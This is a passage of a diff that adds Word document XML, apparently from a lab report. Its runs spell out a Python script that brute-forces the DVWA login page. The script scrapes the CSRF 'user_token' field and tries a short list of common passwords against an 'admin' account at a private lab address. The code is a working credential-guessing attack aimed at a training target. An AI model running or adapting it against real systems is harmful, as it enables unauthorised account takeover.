+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">def </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>get_csrf_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>token</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">session, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    response = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>session.get</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    soup = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>BeautifulSoup</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>response.text</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>, '</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>html.parser</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    token = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>soup.find</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>('input', {'name': '</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>user_token</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'})</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    return token['value'] if token else None</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">def </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>brute_force_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dvwa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, username, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>password_list</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>login_url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = f"{</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>}/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>login.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    session = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>requests.Session</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    for password in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>password_list</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>csrf_token</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>get_csrf_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>token</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">session, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>login_url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        if </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>csrf_token</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            data = {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                'username': username,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">                'password': password,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                'Login': 'Login',</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                '</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>user</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>_token</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">': </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>csrf_token</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        else:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            data = {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                'username': username,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                'password': password,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>'Login': 'Login'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        response = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>session.post</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>login_url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>, data=data)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        if "Login failed" not in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>response.text</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(f"[+] </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>Erfolgreich</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> eingeloggt mit: {</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>}")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>return</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>"[-] Keine Treffer in der Passwortliste.")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>return None</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>if __name__ == "__main__":</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dvwa_url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = "http://10.115.1.6:4280"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    user = "admin"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    passwords = ["123456", "password", "admin", "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>letmein</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>", "password123"]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
